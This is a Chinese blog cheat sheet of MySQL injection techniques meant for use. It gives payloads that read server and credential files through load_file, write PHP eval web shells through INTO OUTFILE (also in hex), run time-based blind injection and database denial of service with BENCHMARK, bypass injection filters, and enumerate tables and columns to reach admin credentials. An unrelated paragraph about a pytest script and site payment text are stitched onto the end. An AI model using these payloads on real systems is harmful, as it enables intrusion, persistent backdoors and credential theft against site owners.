mysql 注入用例_mysql-常用注入渗透手法

mysql:

内置函数常用函数:left(), mid(), ord(),  length(), benchmark(),load_file(), outfile(), concat(),

系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),

ASCII码:select char(97,100,109,105,110 ) 回显:admin

16进制:select 0x61646D696E 回显:admin

注释方法: /*  --

使用 /**/ 或者 + 代替空格

@@datadir 读取数据库路径

@@basedir MYSQL 安装路径

@@version_compile_os 操作系统

load_file:linux,windows写全路径时候,c:/1.txt, /var/www/1.php  路径均为左斜杠 /

c:/windows/php.ini  c:/winnt/php.ini   c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名  c:/winnt/my.ini   c:/boot.ini

/etc/password /   /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录   /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!FreeBSD下:

load_file(char(47))  列出了此FreeBSD系统的根目录

读不出来的原因:1.权限不够:  and (select count(*) from mysql.user)>0--  如果返回OK,则表示有权限。如果Denied则NO

2.回显长度限制,Substring(load_file(A),0,50),Substring(load_file(A),50,100)一步一步读  3.concat()拼接

outfile:写入条件:1. 未过滤' '  2.权限  3.得到网站物理路径

已经上传了JPG小马,  unionselect 1,load_file( /var/www/xiaoma.jpg),3,4,5,6 into outfile '/var/www/xiaoma.php'/*

直接写入小马,union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/var/www/xm.php'/*

||

等价于

||

0x3C3F706870206576616C28245F504F53545B636D645D293F3E

数据库导出马:

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

create databaseSupers;useSupers;create table SuperT(code text);insert into SuperT(code) values ("<?php @eval($_POST['cmd']);?>");select * from SuperT intooutfile "D:\\xxx\\shell.php";drop database Supers;

View Code

BENCHMARK:重复执行。不仅可以在display_errors=Off时候,无法判断SQL正确与否。让我们盲注的时候判断技巧。而且可以用来DDOS攻击数据库!

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*UNION SELECT IF(SUBSTRING(user_password,1 ,1) = CHAR(52),BENCHMARK(5000000,md5('test')),null) FROM mb_users WHERE user_group = 1;

View Code

绕过防注入:

id=-255+union+/*!select*/+1,2,3,4    +号代替被顾虑的空格, !

and 1=2 un%ion sel%ect 1,2,3,4,sys%tem_us%er()  %绕过被过滤的SQL语句

爆表:

select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- 爆出第1个表

select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 1,1) t order by table_schema desc)t limit 1-- 爆出第2个表

......爆出所有有用的表后,假如得到admin表: 0x61646D696E

select 0,0,concat(cast(count(*) as char)),0 from information_schema.columns where table_name=0x61646D696Eand table_schema=database() limit 1--  爆出ADMIN表的列数

select 0,0,concat(column_name) from (select * from (select * from information_schema.columns wheretable_name=0x61646D696E and table_schema=database() order by 1 limit 0,1) t order by 1 desc)t limit 1-- 爆出ADMIN表第一个列。即索引为0的列...

root或者足够权限可以爆数据库用户帐户,密码:user password

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
这段代码是一个使用Python的pytest测试框架编写的测试脚本。它包含了一个测试用例和一个测试类,以及一个pytest的fixture。 - pytest.fixture(autouse=True, scope="class"):这是一个pytest的fixture,用于在测试脚本执行前进行一些准备工作。其中,autouse=True表示这个fixture会自动应用到所有测试函数和测试类中,而scope="class"表示这个fixture的作用范围是整个测试类。 - test_a、test_b、test_c、test_d:这些是测试用例,用于测试被测系统的不同功能点。它们都是普通的Python函数,函数名以test_开头,用于被pytest识别为测试用例。 - Test_Case:这是一个测试类,用于组织多个测试用例,并提供一些共享的数据和方法。它也是一个普通的Python类,类名以Test_开头,用于被pytest识别为测试类。 - if name == 'main': pytest.main(['-s', 'test_02_auto_scope.py']):这是一个简单的main函数,用于运行测试脚本。当直接运行这个脚本时,会调用pytest.main()函数来执行测试用例。其中,-s表示输出测试过程中的print语句,test_02_auto_scope.py表示测试脚本的文件名。 在这个测试脚本中,使用了pytest的fixture机制来管理测试用例的执行环境。autouse=True表示这个fixture会自动应用到所有测试函数和测试类中,而scope="class"表示这个fixture的作用范围是整个测试类。因此,当执行这个测试脚本时,会先执行test1这个fixture函数,然后再依次执行所有的测试用例。在测试用例执行过程中,如果需要使用test1这个fixture提供的数据或资源,可以在测试函数或测试类中声明一个同名的参数。pytest会自动将fixture返回的数据或资源作为参数传递给测试函数或测试类。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值